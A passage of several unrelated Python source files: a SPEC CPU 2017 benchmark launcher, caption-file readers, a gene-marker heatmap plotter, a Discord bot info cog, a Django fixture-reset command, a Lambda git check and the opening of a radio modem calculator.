'roms_r', Benchmarks.XZ.value: 'xz_r' } INPUT_TYPES = ['refrate', 'refspeed', 'test', 'train'] # Args # - Files consumed as arguments INPUT_FILES = { Benchmarks.PERL.value: ['checkspam.pl'], Benchmarks.GCC.value: ['ref32.c'], Benchmarks.MCF.value: ['inp.in'], Benchmarks.CACTUS.value: ['spec_ref.par'], Benchmarks.PAREST.value: ['ref.prm'], Benchmarks.POVRAY.value: ['SPEC-benchmark-ref.ini'], Benchmarks.OMNETPP.value: ['omnetpp.ini'], Benchmarks.XALAN.value: ['t5.xml', 'xalanc.xsl'], Benchmarks.X264.value: ['BuckBunny.yuv'], Benchmarks.BLENDER.value: ['sh3_no_char.blend'], Benchmarks.DEEPSJENG.value: ['ref.txt'], Benchmarks.LEELA.value: ['ref.sgf'], Benchmarks.XZ.value: ['../../all/input/cld.tar.xz'] } # - Files consumed when piped from stdin STDIN_FILES = { Benchmarks.BWAVES.value: 'bwaves_1.in', Benchmarks.ROMS.value: 'ocean_benchmark2.in.x', } # - Files which contain command line arguments ARGS_FILES = { Benchmarks.PERL.value: 'checkspam.in', Benchmarks.NAMD.value: 'namd.in', Benchmarks.LBM.value: 'lbm.in', Benchmarks.NAB.value: 'control', Benchmarks.EXCHANGE2.value: 'control', } # - Used for script-like benchmarks that link with other scripts LIB_DIR = { Benchmarks.PERL.value: 'lib', } # - All other arguments that are static MISC_ARGS = { Benchmarks.GCC.value: [ '-O3', '-fselective-scheduling', '-fselective-scheduling2' ], Benchmarks.X264.value: [ '--crf', '0', '-o', 'x264.out' ], } # - Commands to run before we can execute the benchmark. Can also return # arguments. 
@staticmethod def _povray_setup(b, i, d): shutil.copy('{}/{}/{}/input/SPEC-benchmark-ref.pov'.format(d, b, i), './SPEC-benchmark-ref.pov') return [ '+L{}/{}/all/input'.format(d, b) ] @staticmethod def _wrf_setup(b, i, d): from glob import glob shutil.copy('{}/{}/{}/input/namelist.input'.format(d, b, i), './namelist.input') for f in glob('{}/{}/all/input/*'.format(d, b)): shutil.copy(f, '.') def _x264_setup(self, b, i, d): from subprocess import run, DEVNULL real_input = Path(d) / b / i / 'input' / 'BuckBunny.yuv' if not real_input.exists(): unprocessed_input = Path(d) / b / i / 'input' / 'BuckBunny.264' decode_bin = self.bin_dir / 'ldecod_r' decode_args = [ str(decode_bin), '-p', 'InputFile={}'.format(str(unprocessed_input)), '-p', 'OutputFile={}'.format(str(real_input)) ] proc = run(decode_args, stdout=DEVNULL, stderr=DEVNULL) if proc.returncode != 0: raise Exception('Could not decode input file') return ['1280x720'] @staticmethod def _cam4_setup(b, i, d): input_dir = Path(d) / b / i / 'input' common_dir = Path(d) / b / 'all' / 'input' assert input_dir.exists() and common_dir.exists() all_files = itertools.chain(input_dir.iterdir(), common_dir.iterdir()) for fp in all_files: shutil.copy(str(fp), '.') @staticmethod def _imagick_setup(b, i, d): input_file = Path(d) / b / i / 'input' / 'refrate_input.tga' assert input_file.exists() shutil.copy(str(input_file), '.') return ['refrate_convert.out', 'refrate_convert.err', '-limit', 'disk', '0', 'refrate_input.tga', '-edge', '41', '-resample', '181%', '-emboss', '31', '-colorspace', 'YUV', '-mean-shift', '19x19+15%', '-resize', '3', '0%', 'refrate_output.tga'] @staticmethod def _fotonik3d_setup(b, i, d): input_dir = Path(d) / b / i / 'input' assert input_dir.exists() for f in input_dir.iterdir(): if '.xz' in f.name: os.system('xz -d -k {}'.format(str(f))) new_file = Path(str(f).replace('.xz', '')) if not (Path('.') / new_file.name).exists(): shutil.move(str(new_file), '.') elif not (Path('.') / f.name).exists(): shutil.copy(str(f), '.') SETUP_FNS = { Benchmarks.NAMD.value: lambda _, b, i, d: shutil.copy( '{}/{}/all/input/apoa1.input'.format(d, b), './apoa1.input'), Benchmarks.POVRAY.value: lambda _, b, i, d: Spec2017Bench._povray_setup(b, i, d), Benchmarks.LBM.value: lambda _, b, i, d: shutil.copy( '{}/{}/{}/input/100_100_130_ldc.of'.format(d, b, i), './100_100_130_ldc.of'), Benchmarks.OMNETPP.value: lambda _, b, i, d: shutil.copytree( '{}/{}/all/input/ned'.format(d, b), '{}/{}/{}/input/ned'.format(d, b, i)) if not (Path(d) / b / i / 'input/ned').exists() else None, Benchmarks.WRF.value: lambda _, b, i, d: Spec2017Bench._wrf_setup(b, i, d), Benchmarks.X264.value: lambda obj, b, i, d: obj._x264_setup(b, i, d), Benchmarks.BLENDER.value: lambda *_, **__: ['--background', '--render-frame', '1', '--render-output', '.'], Benchmarks.CAM4.value: lambda _, b, i, d: Spec2017Bench._cam4_setup(b, i, d), Benchmarks.IMAGICK.value: lambda _, b, i, d: Spec2017Bench._imagick_setup(b, i, d), Benchmarks.NAB.value: lambda _, b, i, d: shutil.copytree( '{}/{}/{}/input/1am0'.format(d, b, i), './1am0') \ if not Path('./1am0').exists() else None, Benchmarks.EXCHANGE2.value: lambda _, b, i, d: shutil.copy( '{}/{}/all/input/puzzles.txt'.format(d, b), './puzzles.txt'), Benchmarks.FOTONIK3D.value: lambda _, b, i, d: Spec2017Bench._fotonik3d_setup(b, i, d), Benchmarks.ROMS.value: lambda _, b, i, d: shutil.copy( '{}/{}/all/input/varinfo.dat'.format(d, b), '.'), Benchmarks.XZ.value: lambda *_, **__: [ '216.3MiB', 
('19cf30ae51eddcbefda78dd06014b4b96281456e078ca7c13e1c0c9e6aaea8df' 'f3efb4ad6b0456697718cede6bd5454852652806a657bb56e07d61128434b474'), '160', '59,796,407', '61,004,416', '6'] } def _create_input_dir(self): spec_inner = self.spec_src_path / 'benchspec' / 'CPU' assert spec_inner.exists() if not self.input_dir.exists(): self.input_dir.mkdir() for bench in self.Benchmarks: input_target = spec_inner / bench.value / 'data' input_linkname = self.input_dir / bench.value input_linkname.symlink_to(input_target) def _init_dir_structure(self): if self.workspace_path.exists(): return # Now we want to set up the bin, input, and lib dirs for each benchmark self.workspace_path.mkdir() self.src_dir.mkdir() self.lib_dir.mkdir() self.input_dir.mkdir() spec_inner = self.spec_src_path / 'benchspec' / 'CPU' assert spec_inner.exists() for bench in self.Benchmarks: # Sources src_target = list((spec_inner / bench.value / 'build').glob('build_*')) assert src_target and len(src_target) == 1 src_linkname = self.src_dir / bench.value src_linkname.symlink_to(src_target[0]) # Inputs input_target = spec_inner / bench.value / 'data' input_linkname = self.input_dir / bench.value input_linkname.symlink_to(input_target) if bench.value in self.LIB_DIR: lib_target = list((spec_inner / bench.value / 'run' ).glob('run_*')) assert lib_target lib_linkname = self.lib_dir / bench.value lib_linkname.symlink_to(lib_target[0]) # Also link in the Makefile. class_makefile = Path(__file__).parent / 'Makefile' assert class_makefile.exists() self.makefile.symlink_to(class_makefile) def _make_binaries(self): if self.bin_dir.exists() and len(list(self.bin_dir.iterdir())) > 2: return import subprocess import shlex cmd = shlex.split('make SPEC17_ROOT={} -C {} -j{}'.format( self.spec_src_path, self.workspace_path, os.cpu_count())) subprocess.check_call(cmd) def __init__(self, spec_src_path, workspace_path): assert spec_src_path is not None and workspace_path is not None assert isinstance(spec_src_path, Path) and spec_src_path.exists() self.spec_src_path = spec_src_path self.workspace_path = workspace_path self.src_dir = workspace_path / 'src' self.bin_dir = workspace_path / 'bin' self.lib_dir = workspace_path / 'lib' self.input_dir = workspace_path / 'data' self.makefile = workspace_path / 'Makefile' def _get_input_file_args(self, bench_name, input_type): if bench_name not in self.__class__.INPUT_FILES: return [] input_file_args = [] input_file_names = self.__class__.INPUT_FILES[bench_name] parent_dir = self.input_dir / bench_name / input_type / 'input' if not parent_dir.exists(): self._create_input_dir() for infile in input_file_names: input_path = parent_dir / infile assert input_path.exists() input_file_args += [str(input_path.resolve())] return input_file_args def _get_stdin_args(self, bench_name, input_type): if bench_name not in Spec2017Bench.STDIN_FILES: return [] stdin_file_name = Spec2017Bench.STDIN_FILES[bench_name] stdin_path = self.input_dir / bench_name / input_type / 'input' / stdin_file_name assert stdin_path.exists() return [ '<', str(stdin_path) ] def _get_cmdline_args(self, bench_name, input_type): if bench_name not in self.__class__.ARGS_FILES: return [] args_file_name = self.__class__.ARGS_FILES[bench_name] args_file_path = self.input_dir / bench_name / input_type / 'input' / args_file_name assert args_file_path.exists() with args_file_path.open() as f: lines = f.readlines() args_raw = lines[-1].strip().replace('\t', ' ') return args_raw.split(' ') def _get_lib_args(self, bench_name): if bench_name not in 
self.__class__.LIB_DIR: return [] lib_dir_name = self.__class__.LIB_DIR[bench_name] lib_dir_path = self.lib_dir / bench_name / lib_dir_name assert lib_dir_path.exists() return ['-I', str(lib_dir_path)] def _get_misc_args(self, bench_name): if bench_name not in self.MISC_ARGS: return [] return self.MISC_ARGS[bench_name] def _get_setup_fn_args(self, bench_name, input_type): fn = lambda *_, **__: None if bench_name in self.__class__.SETUP_FNS: fn = self.__class__.SETUP_FNS[bench_name] maybe_args = fn(self, bench_name, input_type, self.input_dir) if isinstance(maybe_args, list): return maybe_args return [] def _get_bin_path(self, bench_name): assert self.bin_dir.exists() bin_name = Spec2017Bench.BIN_NAMES[bench_name] bin_path = self.bin_dir / bin_name assert bin_path.exists() return bin_path def create(self, bench_name, input_type): assert bench_name in Spec2017Bench.BENCHMARKS assert input_type in Spec2017Bench.INPUT_TYPES self._init_dir_structure() self._make_binaries() bin_path = self._get_bin_path(bench_name) setup_args = self._get_setup_fn_args(bench_name, input_type) input_args = self._get_input_file_args(bench_name, input_type) lib_args = self._get_lib_args(bench_name) misc_args = self._get_misc_args(bench_name) stdin_args = self._get_stdin_args(bench_name, input_type) cmdline_args = self._get_cmdline_args(bench_name, input_type) args = lib_args + misc_args + input_args + cmdline_args + stdin_args + setup_args print(str(bin_path) + ' ' + ' '.join(args)) return Benchmark(bin_path, args)
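if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): both paths are
    # placeholders, and a real SPEC CPU 2017 source tree must exist at
    # spec_src for the directory-structure assertions to pass.
    spec_src = Path('/opt/spec2017')           # hypothetical SPEC install
    workspace = Path('/tmp/spec17_workspace')  # hypothetical workspace
    suite = Spec2017Bench(spec_src, workspace)
    # create() links sources/inputs into the workspace, builds the binaries
    # via the bundled Makefile, then assembles the argument list.
    bench = suite.create(Spec2017Bench.Benchmarks.MCF.value, 'refrate')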
11589437
import json
import numpy as np


def check_img_list(sentid, imgid):
    # A sentence ID looks like "<image id>[.jpg|.mp4]#<sentence number>";
    # return 1 if it belongs to the given image/video ID, else 0.
    true_imgid = sentid.split('#')[0]
    if true_imgid.endswith('.jpg') or true_imgid.endswith('.mp4'):
        true_imgid = true_imgid[:-4]
    return 1 if true_imgid == imgid else 0


def readSentsInfo(inputfile):
    # Read "<sent_id> <sentence>" lines into parallel lists of IDs and
    # sentences, plus an ID-to-sentence dict.
    sent_ids = []
    sents = []
    id2sents = {}
    for line in open(inputfile):
        data = line.strip().split(' ', 1)
        sent_ids.append(data[0])
        sents.append(data[1])
        id2sents[data[0]] = data[1]
    return (sent_ids, sents, id2sents)


def readImgSents(inputfile):
    # Read the same format, additionally collecting the unique image IDs;
    # the assert guards against one image's sentences being interleaved
    # with another's.
    sent_ids = []
    img_list = []
    sents = []
    for line in open(inputfile):
        data = line.strip().split(' ', 1)
        sent_ids.append(data[0])
        sents.append(data[1])
        img = data[0].split("#")[0].strip().split('.jpg')[0]
        if img not in img_list:
            img_list.append(img)
        else:
            assert img_list[-1] == img
    return img_list, sent_ids, sents
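if __name__ == "__main__":
    # Minimal self-contained check of check_img_list(); the IDs below are
    # illustrative only.
    assert check_img_list("36979.jpg#2", "36979") == 1
    assert check_img_list("36979.jpg#2", "12345") == 0
    assert check_img_list("video01.mp4#0", "video01") == 1
    print("check_img_list OK")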
11589445
import matplotlib.pyplot as plt import seaborn as sns import pandas as pd from typing import Union import numpy as np import pandas as pd from ._utils import series_to_colors from ._utils import color_list_to_matrix_and_cmap def marker_heatmap( X: pd.DataFrame, signatures: pd.DataFrame, order_series: pd.Series, subset_genes: Union[pd.Series,None] = None, diff: float = 0.5, max_norm: float = 0.5, figsize: tuple = (16,12), cmap: str ="YlGnBu", display_y: bool = False, vmax: float = None, vmin: float = None, cohort_s: Union[pd.Series,None] = None, y_hm_label: str = 'Genes', cbar_hm_label: str = 'Normalized Expression' ): """ Plot marker map. ----------------------------- Args: * X: pd.DataFrame of input sample x feature matrix * signatures: pd.DataFrame signatures output; this bundles information about the weightings of each feature (ex. gene) and what signature they map to * order_series: series of samples mapping to subgroups index: X.index values: subgrouping * subset_series: a pd.Series with the index as the gene name or ID that matches the marker matrix & has a "Subgroup" column for labeling * diff: difference of loading for called signature vs. rest * max_norm: strength of loading for called signature * figsize: size of figure * cmap: colormap for plot * display_y: whether or not to display feature names * vmax: colorbar max * vmin: colorbar min * cohort_s: cohort_series dataframe (added on top of plot) * y_hm_label: label of y-axis on heatmap (ex. Genes, Protein LFC, etc.) * cbar_hm_label: label of heatmap colorbar Returns: * plt.Figure """ # Filter for marker genes signatures_filt = signatures[(signatures['diff'] > diff) & (signatures['max_norm'] > max_norm)] # Remove signatures with no marker genes associated order_series = order_series[order_series.isin(set(signatures_filt['max_id'].astype(int)))] # Filter X matrix sample_markers = X.loc[signatures_filt.index, order_series.sort_values().index] # Set horizontal lines hz_lines = np.unique(sample_markers.join(signatures_filt).loc[:,'max_id'].values, return_index=True)[1] fig, ax = plt.subplots(figsize=figsize) x0 = ax.get_position().x0 x1 = ax.get_position().x1 y0 = ax.get_position().y0 y1 = ax.get_position().y1 buf = y1*0.01 cbar_ax = fig.add_axes([.91, 0.5, .025, .3]) sns.heatmap(sample_markers, ax=ax, cmap=cmap, rasterized=True, cbar_ax=cbar_ax, vmax=vmax, vmin=vmin) v,c = np.unique(order_series, return_counts=True) # plot horizontal lines _c = np.cumsum(c) _ci = np.roll(_c,2) _ci[0] = 0 _ci[1] = 0 ax.hlines(hz_lines, _ci, _c, rasterized=True) # plot vertical lines _h = list(hz_lines) _h.append(sample_markers.shape[0]) ax.vlines(np.cumsum(c)[:-1], _h[:-2], _h[2:], rasterized=True) ax.vlines(np.cumsum(c)[:-1], 0, sample_markers.shape[0], alpha=0.4, rasterized=True) # set ticks ax.set_xticks(np.cumsum(c)-c/2) ax.set_xticklabels(v, rotation=360,fontsize=14) ax.set_yticks(np.arange(sample_markers.index.values.shape[0])) # add gene markings if subset_genes is not None: ax.set_yticks([]) ax.set_yticklabels([], rasterized=True) lax = fig.add_axes([x0-3*buf, y0, 2*buf, y1-y0]) lax.set_xticks([]) lax.set_yticks([]) meta = sample_markers.drop(columns=list(sample_markers)).join(subset_genes).iloc[:,0] colors_conversion, meta_colormap = series_to_colors(meta) meta_colormap_inv = dict([[v,k] for k,v in meta_colormap.items()]) meta_colormap_inv = {(k[0],k[1],k[2]):v for k,v in meta_colormap_inv.items()} cbar_lax = fig.add_axes([0.06, 0.68, 2*buf, .2]) # Add heatmapping mat,cmap = color_list_to_matrix_and_cmap(colors_conversion) sns.heatmap( 
mat.T, cmap=cmap, ax=lax, yticklabels=False, xticklabels=False, cbar=True, cbar_ax=cbar_lax, ) cb_ticks = [float(t.get_text().replace('−','-')) for t in cbar_lax.get_yticklabels()] color_value_mapping = dict() for v in np.unique(mat): color_code = list(cmap.__call__(v)) color_code = tuple(color_code[:3]) color_value_mapping[v] = meta_colormap_inv[color_code] cbar_lax.get_yaxis().set_ticks([]) n_labels = len(list(color_value_mapping.keys())) vals = [x * ((n_labels)/(n_labels+1)) + 0.5 * ((n_labels)/(n_labels+1)) for x in list(color_value_mapping.keys())] cbar_lax.get_yaxis().set_ticks(vals) cbar_lax.get_yaxis().set_ticklabels(list(color_value_mapping.values()),) cbar_lax.yaxis.set_ticks_position('left') cbar_lax.set_frame_on(True) lax.set_ylabel('Marker Genes', fontsize=14) ax.set_ylabel("") for _, spine in lax.spines.items(): spine.set_visible(True) # --------------subset genes------------------- else: if display_y: ax.set_yticklabels(sample_markers.index.values, fontsize=5, rasterized=True) else: ax.set_yticks([]) ax.set_yticklabels([], rasterized=True) ax.set_ylabel(y_hm_label, fontsize=14) # Add sample anont if cohort_s is not None: # Get ordering and samples cohort_s = cohort_s.loc[sample_markers.columns] # Create axis cs_ax = fig.add_axes([x0, y1+2*buf, x1*.86, 2*buf]) cs_ax.set_xticks([]) cs_ax.set_yticks([]) cbar_cs_ax = fig.add_axes([x0, y1+6*buf, x1*.25, 2*buf]) colors_conversion, meta_colormap = series_to_colors(cohort_s) meta_colormap_inv = dict([[v,k] for k,v in meta_colormap.items()]) meta_colormap_inv = {(k[0],k[1],k[2]):v for k,v in meta_colormap_inv.items()} mat,cmap = color_list_to_matrix_and_cmap(colors_conversion) sns.heatmap( mat, cmap=cmap, ax=cs_ax, yticklabels=False, xticklabels=False, cbar=True, cbar_ax=cbar_cs_ax, cbar_kws={"orientation": "horizontal"} ) cb_ticks = [float(t.get_text().replace('−','-')) for t in cbar_cs_ax.get_yticklabels()] color_value_mapping = dict() for v in np.unique(mat): color_code = list(cmap.__call__(v)) color_code = tuple(color_code[:3]) color_value_mapping[v] = meta_colormap_inv[color_code] cbar_cs_ax.get_xaxis().set_ticks([]) n_labels = len(list(color_value_mapping.keys())) vals = [x * ((n_labels)/(n_labels+1)) + 0.5 * ((n_labels)/(n_labels+1)) for x in list(color_value_mapping.keys())] cbar_cs_ax.get_xaxis().set_ticks(vals) cbar_cs_ax.get_xaxis().set_ticklabels(list(color_value_mapping.values())) cbar_cs_ax.xaxis.set_ticks_position('top') cbar_cs_ax.set_frame_on(True) [spine.set_visible(True) for _, spine in cs_ax.spines.items()] # --------------sample annot------------------- ax.set_title('') ax.set_xlabel('NMF Signatures', fontsize=14) cbar_ax.set_ylabel(cbar_hm_label, fontsize=12) [spine.set_visible(True) for _, spine in ax.spines.items()] return fig
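if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module).  Note that,
    # despite the docstring, the indexing above treats X as feature x sample
    # (rows are genes, columns are samples).  The relative `._utils` imports
    # mean this block only runs inside its package (e.g. via `python -m ...`).
    genes = ["gene{}".format(i) for i in range(6)]
    samples = ["s{}".format(i) for i in range(8)]
    rng = np.random.default_rng(0)
    X_demo = pd.DataFrame(rng.random((6, 8)), index=genes, columns=samples)
    signatures_demo = pd.DataFrame({
        "diff": [0.9] * 6,       # all pass the default diff > 0.5 filter
        "max_norm": [0.8] * 6,   # all pass the default max_norm > 0.5 filter
        "max_id": [0, 0, 0, 1, 1, 1],
    }, index=genes)
    order_demo = pd.Series([0, 0, 0, 0, 1, 1, 1, 1], index=samples)
    fig = marker_heatmap(X_demo, signatures_demo, order_demo)
    fig.savefig("marker_heatmap_demo.png")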
11589463
import discord from discord.ext import commands import variables as var from functions import get_prefix import database as db class Extras(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() async def ping(self, ctx): await ctx.send( f"Pong 🏓! Response time: {round(self.bot.latency * 1000)}ms" ) @commands.command(aliases=["userinfo"]) async def user(self, ctx, user:discord.User=None): if not user: user = ctx.author embed = discord.Embed( title=f"{user} info", color=var.C_MAIN ) embed.set_thumbnail(url=user.avatar.url) embed.add_field(name="ID", value=user.id, inline=False) embed.add_field(name="Account created", value=user.created_at.strftime("%B %d, %Y"), inline=False) embed.add_field(name="Bot", value=user.bot, inline=False) await ctx.send(embed=embed) @commands.command(aliases=["memberinfo"]) async def member(self, ctx, member:discord.Member=None): if not member: member = ctx.author if member.status == discord.Status.online: status = "<:online:313956277808005120>" elif member.status == discord.Status.idle: status = "<:away:313956277220802560>" elif member.status == discord.Status.dnd: status = "<:dnd:313956276893646850>" elif member.status == discord.Status.offline: status = "<:offline:313956277237710868>" else: status = "<:invisible:313956277107556352>" embed = discord.Embed( title=f"{member} info", description=status, color=var.C_MAIN ) embed.set_thumbnail(url=member.avatar.url) embed.add_field( name="Roles", value=" ".join(role.mention for role in member.roles ), inline=False) embed.add_field(name="Nickname", value=member.nick, inline=False) embed.add_field(name="Status", value=member.status, inline=False) embed.add_field(name="Joined at", value=member.joined_at.strftime("%B %d, %Y"), inline=False) embed.add_field(name="ID", value=member.id, inline=False) await ctx.send(embed=embed) @commands.command() async def source(self, ctx): embed = discord.Embed( title="My Github Source Code Woohoo", description="[GitBolt - Axiol](https://github.com/GitBolt/Axiol)", color=var.C_TEAL ).set_thumbnail( url=( "https://cdn0.iconfinder.com/data/" "icons/shift-logotypes/32/Github-512.png" ) ) await ctx.send(embed=embed) @commands.command() async def invite(self, ctx): embed = discord.Embed( title="My invite link!", description=( "[Invite me from here]" "(https://discord.com/oauth2/authorize?client_id=843484459113775114&permissions=473295959&scope=bot)" ), color=var.C_BLUE ).set_thumbnail( url=( "https://cdn.discordapp.com/attachments/843519647055609856/" "845662999686414336/Logo1.png" ) ) await ctx.send(embed=embed) @commands.command() async def suggest(self, ctx, *, desc=None): if desc is not None: # Support server suggestion channel channel = self.bot.get_channel(843548616505294848) embed = discord.Embed( title=f"{ctx.author}'s idea", description=( f"This idea came from a server named **{ctx.guild.name}**!" ), color=var.C_BLUE ).add_field( name="Suggestion", value=desc ) msg = await channel.send(embed=embed) await msg.add_reaction(var.E_ACCEPT) await msg.add_reaction(var.E_DECLINE) await ctx.send("Suggestion sent to the support server!") else: await ctx.send( f"You need to describe your idea too! 
This is the format\n" f"```{await get_prefix(ctx)} <description of your idea>```\n" f"Don't forget the space after prefix :D" ) @commands.command(aliases=["bot", "info"]) async def about(self, ctx): guild_count = 0 member_count = 0 ping = f"{round(self.bot.latency * 1000)}ms" for guild in self.bot.guilds: guild_count += 1 member_count += guild.member_count embed = discord.Embed( title="Some information about me :flushed:", description=( f"[Donation](https://paypal.me/palbolt) " f"[Vote](https://top.gg/bot/843484459113775114/vote) " f"[Support](https://discord.gg/6xVasmDVaE)" ), color=var.C_MAIN ).add_field( name="Server Count", value=str(guild_count), inline=False ).add_field( name="Members", value=member_count, inline=False ).add_field( name="Made by", value="Bolt#8905", inline=False ).add_field( name="Creation date", value="16 May, 2021", inline=False ).set_footer( text=f"Ping: {ping}" ).set_thumbnail( url=( "https://cdn.discordapp.com/attachments/843519647055609856/" "845662999686414336/Logo1.png" ) ) await ctx.send(embed=embed) @commands.command() async def stats(self, ctx): embed = discord.Embed( title=f"{ctx.guild.name}", color=var.C_TEAL ) embed.add_field(name="Owner", value=ctx.guild.owner, inline=False) embed.add_field( name="All Members", value=ctx.guild.member_count, inline=False ) embed.add_field( name="Channels", value=str(len(ctx.guild.channels)), inline=False ) embed.add_field( name="Voice Channels", value=str(len(ctx.guild.voice_channels)), inline=False ) embed.add_field( name="Roles", value=str(len(ctx.guild.roles)), inline=False ) embed.add_field( name="Boost Level", value=ctx.guild.premium_tier, inline=False ) embed.add_field( name="Created at", value=str(ctx.guild.created_at.strftime("%Y - %m - %d")), inline=False ) embed.set_thumbnail(url=ctx.guild.icon.url) guild_verify_doc = await db.VERIFY.find_one({"_id": ctx.guild.id}) if guild_verify_doc is not None: role = ctx.guild.get_role(guild_verify_doc.get("roleid")) count = sum(role in member.roles for member in ctx.guild.members) embed.add_field(name="Non Verified Members", value=str(count)) await ctx.send(embed=embed) def setup(bot): bot.add_cog(Extras(bot))
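if __name__ == "__main__":
    # Hedged loading sketch (not part of the original cog): registers the cog
    # on a bot directly.  The prefix and token are placeholders; depending on
    # the discord.py version, Bot() may additionally require an `intents`
    # argument, and the surrounding modules (variables, functions, database)
    # must be importable for this file to load at all.
    bot = commands.Bot(command_prefix="!")
    setup(bot)
    # bot.run("YOUR_TOKEN")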
11589467
# A host group defined as a (hosts, group_data) tuple; each host is either a
# plain hostname or a (hostname, host_data) tuple with per-host settings.
hosts = ([
    'somehost',
    ('anotherhost', {'ssh_port': 1022}),
], {})

# A host group can also be defined as a generator of hostnames.
generator_hosts = (host for host in ('hosta', 'hostb'))
11589476
import os from django.contrib.auth import get_user_model from django.core import management from django.core.management.base import BaseCommand from django.core.management.commands import loaddata from django.core.validators import validate_ipv46_address from config.helpers.environment import ENVIRONMENT from v1.accounts.models.account import Account from v1.banks.models.bank import Bank from v1.cache_tools.helpers import rebuild_cache from v1.self_configurations.helpers.self_configuration import get_self_configuration from v1.self_configurations.models.self_configuration import SelfConfiguration from v1.validators.models.validator import Validator """ python3 manage.py initialize_test_confirmation_validator -ip [IP ADDRESS] Running this script will: - delete all Accounts, Banks, SelfConfigurations, Users, and Validators - load in fixture data (same models as above) - rebuild cache Fixture data sets self as the confirmation validator. Default superuser is: username: bucky password: <PASSWORD> """ CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) FIXTURES_DIR = os.path.join(CURRENT_DIR, 'confirmation_validator_fixtures') User = get_user_model() class Command(BaseCommand): help = 'Delete existing data, load in fixture data, set self as confirmation validator, rebuild cache' # noqa: A003 def add_arguments(self, parser): """ Required arguments: -ip_address - Public IP address """ parser.add_argument('-ip', help='Public IP address', required=True) def handle(self, *args, **options): """Run script""" valid_environments = ['local', 'postgres_local'] if ENVIRONMENT not in valid_environments: raise RuntimeError(f'DJANGO_APPLICATION_ENVIRONMENT must be in {valid_environments}') ip = options['ip'] validate_ipv46_address(ip) self.install_fixture_data() self_configuration = get_self_configuration(exception_class=RuntimeError) SelfConfiguration.objects.filter(pk=self_configuration.id).update(ip_address=ip) rebuild_cache(head_block_hash=self_configuration.root_account_file_hash) self.stdout.write(self.style.SUCCESS('Validator initialization complete')) def install_fixture_data(self): """ Delete all Accounts, Banks, SelfConfigurations, Users, and Validators Load in fixture data (same models as above) """ global FIXTURES_DIR self.stdout.write(self.style.SUCCESS('Installing fixture data...')) Account.objects.all().delete() Bank.objects.all().delete() SelfConfiguration.objects.all().delete() User.objects.all().delete() Validator.objects.all().delete() fixture_files = [ 'validator.json', 'account.json', 'bank.json', 'self_configuration.json', 'user.json' ] for fixture_file in fixture_files: fixtures = os.path.join(FIXTURES_DIR, fixture_file) management.call_command(loaddata.Command(), fixtures, verbosity=1) self.stdout.write(self.style.SUCCESS('Fixture data installed successfully'))
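# Hedged usage note (not part of the original command): besides the CLI form
# shown in the module docstring, the command can be invoked programmatically,
# e.g. from a test or another management script; the IP below is a
# placeholder:
#
#     from django.core import management
#     management.call_command('initialize_test_confirmation_validator',
#                             '-ip', '127.0.0.1')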
11589484
import subprocess


def lambda_handler(event, context):
    # Invoke the git binary (it just prints its usage text) to confirm that
    # it is available on the Lambda runtime's PATH, e.g. via a layer;
    # subprocess.run raises FileNotFoundError if the executable is missing.
    subprocess.run(['git'])
    return 'test passed'
11589493
from pro2_chip_configurator.src.si4440_modem_calc.pro2_ocelotmodemcalc import Pro2OcelotModemCalc from pro2_chip_configurator.src.si4440_modem_calc.pro2_ocelotmodemcalcinputs import Pro2OcelotModemCalcInputs from pyradioconfig.calculator_model_framework.interfaces.icalculator import ICalculator from collections import OrderedDict from pycalcmodel.core.variable import ModelVariableFormat, CreateModelVariableEnum from pro2_chip_configurator.src.si4440_modem_calc.decode_api import en4gfsk,enook from pyradioconfig.calculator_model_framework.Utils.CustomExceptions import CalculationException class CALC_Pro2_Demod_Ocelot(ICalculator): def buildVariables(self,model): self._addModelVariable(model, 'pro2_osr_tune', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_pm_pattern', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_modulation_type', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_afc_mode', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_ant_div', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_dsa_mode', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_fs_rx_ch', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'pro2_afc_gain', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'calculated_ksi3', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'calculated_phscale', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'calculated_bw_peak', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'bcr_conc_baudrate', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'bcr_conc_manchester', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'bcr_conc_deviation', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'freq_dev_max', int, ModelVariableFormat.DECIMAL) self._addModelVariable(model, 'freq_dev_min', int, ModelVariableFormat.DECIMAL) def calc_run_pro2(self,model): # This method calls the pro2 calculator # Load model values into local variables modem_frequency_hz = model.vars.modem_frequency_hz.value rx_xtal_error_ppm = model.vars.rx_xtal_error_ppm.value tx_xtal_error_ppm = model.vars.tx_xtal_error_ppm.value bandwidth_hz = model.vars.bandwidth_hz.value base_frequency_hz = model.vars.base_frequency_hz.value test_ber = model.vars.test_ber.value pro2_osr_tune = model.vars.pro2_osr_tune.value pro2_pm_pattern = model.vars.pro2_pm_pattern.value symbol_encoding = model.vars.symbol_encoding.value pro2_modulation_type = model.vars.pro2_modulation_type.value baudrate_tol_req_ppm = model.vars.baudrate_tol_ppm.value deviation = model.vars.deviation.value pro2_afc_mode = model.vars.pro2_afc_mode.value pro2_ant_div = model.vars.pro2_ant_div.value pro2_dsa_mode = model.vars.pro2_dsa_mode.value digmix_res = model.vars.digmix_res_actual.value pro2_fs_rx_ch = model.vars.pro2_fs_rx_ch.value baudrate = model.vars.baudrate.value bcr_demod_en = model.vars.bcr_demod_en.value bcr_detector_en = model.vars.MODEM_PHDMODCTRL_BCRDETECTOR.value #Only run the PRO2 calculator if the BCR demod is enabled if bcr_demod_en or bcr_detector_en == 1: #Create the input dict fdeverror = model.vars.deviation_tol_ppm.value pro2_inputs = OrderedDict({}) pro2_inputs["API_freq_xo"] = modem_frequency_hz pro2_inputs["API_crystal_tol"] = (rx_xtal_error_ppm + tx_xtal_error_ppm)/2.0 pro2_inputs["API_if_mode"] = 2 #Fixed IF = 